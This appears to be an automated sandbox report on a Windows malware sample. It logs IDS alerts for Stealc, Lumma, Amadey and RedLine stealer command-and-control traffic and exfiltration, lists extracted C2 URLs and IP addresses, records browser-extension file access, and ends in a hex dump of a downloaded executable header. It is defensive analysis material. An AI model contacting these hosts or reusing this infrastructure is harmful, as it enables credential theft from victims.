Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4E9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	2_2_6C4E9EC0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4C3FF0 PK11_PrivDecryptPKCS1,	2_2_6C4C3FF0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4C9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	2_2_6C4C9840
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4C3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	2_2_6C4C3850
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4EDA40 SEC_PKCS7ContentIsEncrypted,	2_2_6C4EDA40
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4C3560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	2_2_6C4C3560

Source: 5f198671b1.exe, 0000000C.00000002.2454320259.0000000000FF5000.00000040.00000001.01000000.00000010.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_d8279cf1-d

Phishing

Yara detected obfuscated html page

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta, type: DROPPED

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.75.172:443 -> 192.168.2.4:50074 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49882 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49910 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49933 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49951 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49958 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49969 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49970 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49982 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49999 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50054 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50083 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50086 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:50089 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50090 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50093 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.202.5.153:443 -> 192.168.2.4:50091 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50100 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50105 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50109 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50115 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50123 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50125 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50126 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50133 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50138 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50140 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50141 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50146 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50147 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50148 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50149 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50150 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50151 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50153 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186850902.000000006F8ED000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: freebl3.pdb source: freebl3.dll.2.dr
Source:	Binary string: C:\AdminC4\Workspace\1654247295\Project\Debug\Project.pdb source: 51c549c9c2.exe.11.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.2.dr
Source:	Binary string: nss3.pdb@ source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186528818.000000006C59F000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr
Source:	Binary string: nss3.pdb source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186528818.000000006C59F000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: mozglue.pdb source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186850902.000000006F8ED000.00000002.00000001.01000000.0000000F.sdmp

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe	Memory has grown: Private usage: 6MB later: 39MB
Source: firefox.exe	Memory has grown: Private usage: 1MB later: 204MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49746 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49746 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.115:80 -> 192.168.2.4:49746
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49746 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.115:80 -> 192.168.2.4:49746
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49746 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49772 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49774
Source: Network traffic	Suricata IDS: 2059018 - Severity 1 - ET MALWARE CryptBot CnC Checkin : 192.168.2.4:49845 -> 94.156.102.240:80
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.4:49874 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49866 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059149 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rampnatleadk .click) : 192.168.2.4:53275 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.4:49882 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.4:49894 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.4:49910 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49907 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.4:49922 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.4:49933 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.4:49950 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49947 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.4:49969 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49987 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49995 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.4:49998 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49998 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50022 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50055 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 103.84.89.222:33791 -> 192.168.2.4:49998
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49998 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50087 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50092 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50099 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50104 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49828 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50137 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50135 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:50143 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 103.84.89.222:33791 -> 192.168.2.4:49998
Source: Network traffic	Suricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:50145 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50152 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49736 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49882 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49882 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49910 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49970 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49969 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49951 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49951 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:50098 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:50095 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50123 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50123 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50147 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50147 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50141 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50086 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50086 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50153 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50054 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49874 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49874 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.202.5.153:443 -> 192.168.2.4:50134
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50133 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50133 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49958 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49958 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50083 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50083 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50154 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.202.5.153:443 -> 192.168.2.4:50098
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50138 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50140 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50146 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50146 -> 172.67.181.203:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.115/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: https://rampnatleadk.click/api
Source: Malware configuration extractor	IPs: 185.215.113.43
Source: Malware configuration extractor	URLs: home.fivegg5th.top
Source: Malware configuration extractor	URLs: .fivgg5th.top
Source: Malware configuration extractor	URLs: .fivhttph.top
Source: Malware configuration extractor	URLs: gPhome.fivegg5th.top
Source: Malware configuration extractor	URLs: a.dnspod.comh.top

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 50143 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 50143
Source: unknown	Network traffic detected: HTTP traffic on port 50145 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 50145

Source: unknown

Network traffic detected: DNS query count 39

Source: global traffic

TCP traffic: 192.168.2.4:49998 -> 103.84.89.222:33791

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:36:25 GMTContent-Type: application/octet-streamContent-Length: 1828864Last-Modified: Sat, 01 Feb 2025 20:32:10 GMTConnection: keep-aliveETag: "679e84ca-1be800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 cb bd 98 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 e0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 6a 00 00 04 00 00 7f 7c 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 72 7a 61 72 6a 61 6b 00 50 1a 00 00 80 4f 00 00 42 1a 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 6c 71 63 65 68 61 61 00 10 00 00 00 d0 69 00 00 04 00 00 00 c2 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 69 00 00 22 00 00 00 c6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
